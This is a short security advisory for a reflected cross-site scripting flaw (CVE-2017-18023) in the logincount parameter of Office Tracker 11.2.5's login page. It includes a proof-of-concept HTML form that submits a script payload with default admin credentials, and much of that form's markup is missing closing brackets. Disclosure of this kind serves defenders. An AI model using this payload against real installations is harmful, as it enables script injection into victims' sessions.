# Title: Office Tracker 11.2.5 - XSS

# Author: Nassim Asrir

# Contact: wassline@gmail.com

# Vendor: https://www.officetracker.com/

# CVE: CVE-2017-18023



# Description

 Office Tracker 11.2.5 has XSS via the
 logincount parameter to the /otweb/OTPClientLogin URI.

 ------------------------------------------

# Details

 The value of the logincount request parameter is copied into the HTML
 document as plain text between tags. The payload
 chfkh<scriptalert(1)</scriptp9glb was submitted in the logincount
 parameter. This input was echoed unmodified in the application's
 response.

 ------------------------------------------

# Vulnerability Type
 
 Cross Site Scripting (XSS)

 ------------------------------------------

# Attack Type

 Remote
 ------------------------------------------

# POC
 <html>
  
   <body
   <scripthistory.pushState('', '', '/')</script
     <form action="http://server/otweb/OTPClientLogin" method="POST"
       <input type="hidden" name="logincount" value="0chfkh<script>alert(1)</script>p9glb" /
       <input type="hidden" name="lastname" value="MorisonM" /
       <input type="hidden" name="timezone" value="" /
       <input type="hidden" name="uid" value="" /
       <input type="hidden" name="phone" value="false" /
       <input type="hidden" name="login" value="admin" /
       <input type="hidden" name="password" value="admin" /
       <input type="hidden" name="submitbtn" value="Login" /
       <input type="submit" value="Submit request" /
     </form
   </body
 </html

 ------------------------------------------